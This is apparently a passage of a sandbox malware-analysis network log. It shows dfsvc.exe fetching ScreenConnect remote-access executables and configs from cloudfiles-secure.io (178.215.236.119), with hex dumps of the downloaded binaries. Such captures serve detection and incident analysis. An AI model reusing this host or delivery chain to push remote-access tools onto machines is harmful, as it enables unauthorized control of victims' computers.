                                                                                                                                                                                                                2024-10-02 04:16:28 UTC16384INData Raw: 54 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00
                                                                                                                                                                                                                Data Ascii: ThresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_Item
                                                                                                                                                                                                                2024-10-02 04:16:28 UTC12280INData Raw: 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3e 00 0d 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 00 00 00 00 00 42 00 0d 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31
                                                                                                                                                                                                                Data Ascii: Connect.WindowsBackstageShell.exe<ProductNameScreenConnect>ProductVersion24.2.10.8991BAssembly Version24.2.10.8991


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                4192.168.2.449750178.215.236.1194436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-10-02 04:16:29 UTC140OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                                                                Host: cloudfiles-secure.io
                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                2024-10-02 04:16:29 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                Content-Length: 266
                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                Date: Wed, 02 Oct 2024 04:16:29 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-10-02 04:16:29 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                5192.168.2.449751178.215.236.1194436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-10-02 04:16:30 UTC111OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                                                                Host: cloudfiles-secure.io
                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                2024-10-02 04:16:30 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                Content-Length: 266
                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                Date: Wed, 02 Oct 2024 04:16:29 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-10-02 04:16:30 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                6192.168.2.449752178.215.236.1194436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-10-02 04:16:31 UTC119OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                                                                Host: cloudfiles-secure.io
                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                2024-10-02 04:16:31 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                Content-Length: 266
                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                Date: Wed, 02 Oct 2024 04:16:31 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-10-02 04:16:31 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                7192.168.2.449753178.215.236.1194436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-10-02 04:16:32 UTC109OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                                                                Host: cloudfiles-secure.io
                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                2024-10-02 04:16:32 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                Content-Length: 81696
                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                Date: Wed, 02 Oct 2024 04:16:31 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-10-02 04:16:32 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 da a7 bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 6a 8b 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0@^ `@ `j@
                                                                                                                                                                                                                2024-10-02 04:16:32 UTC16384INData Raw: 2d 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 d2 59 fd a1 c3 db f8 b2 a8 38 41 41 b5 70 2f b9 70 e0 44 04 4a 6f 16 7f 54 f3 2d 91 6d bf ac 66 21 46 ef be d1 1e 85 dd 2b 75 b8 ff 7a 0d c8 39 d0 7b 2a 86 54 8d 79 d9 5d b2 8a 3c 12 a6 c1 3c 94 5c c5 c2 54 9b e5 b0 38 01 34 d6 47 4a 0b 62 7d 82 0a bc 8e 63 9f ae dc 13 7e 39 98 c7 b5 f2 fd 11 5b 4c 23 82 a4 fd 40 df 22 18 d8 3f 0b 56 59 b3 b5 88 4c 17 d4 e9 59 bc f3 d5 72 d6 78 1b 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34
                                                                                                                                                                                                                Data Ascii: -452b-8975-74a85828d354TextStateY8AAp/pDJoT-mf!F+uz9{*Ty]<<\T84GJb}c~9[L#@"?VYLYrx{^@RSDSL[M9iHF4
                                                                                                                                                                                                                2024-10-02 04:16:32 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff
                                                                                                                                                                                                                Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
                                                                                                                                                                                                                2024-10-02 04:16:32 UTC16384INData Raw: 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00
                                                                                                                                                                                                                Data Ascii: fffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
                                                                                                                                                                                                                2024-10-02 04:16:32 UTC16376INData Raw: 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: n


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                8192.168.2.449754178.215.236.1194436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-10-02 04:16:33 UTC97OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                                                                Host: cloudfiles-secure.io
                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                2024-10-02 04:16:33 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                Content-Length: 197120
                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                Date: Wed, 02 Oct 2024 04:16:33 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-10-02 04:16:33 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 3c cd b8 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 9e 14 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZ<" 0 `@
                                                                                                                                                                                                                2024-10-02 04:16:33 UTC16384INData Raw: 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a
                                                                                                                                                                                                                Data Ascii: &rYpov&(, ow&}ow&o)**.(*&(**^uw,w(***0@surpov&rYpov&(, ow&}ow&o)**.(*&(**^ux,x(***0@su
                                                                                                                                                                                                                2024-10-02 04:16:33 UTC16384INData Raw: 04 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc
                                                                                                                                                                                                                Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
                                                                                                                                                                                                                2024-10-02 04:16:33 UTC16384INData Raw: 01 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f
                                                                                                                                                                                                                Data Ascii: GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
                                                                                                                                                                                                                2024-10-02 04:16:33 UTC16384INData Raw: b2 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00
                                                                                                                                                                                                                Data Ascii: *+{>+Bd+/q+PX!*++j,f f,f f: ,t',x)*f2vV
                                                                                                                                                                                                                2024-10-02 04:16:33 UTC16384INData Raw: 1c 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15
                                                                                                                                                                                                                Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkk
                                                                                                                                                                                                                2024-10-02 04:16:33 UTC16384INData Raw: 52 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74
                                                                                                                                                                                                                Data Ascii: RequestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadat
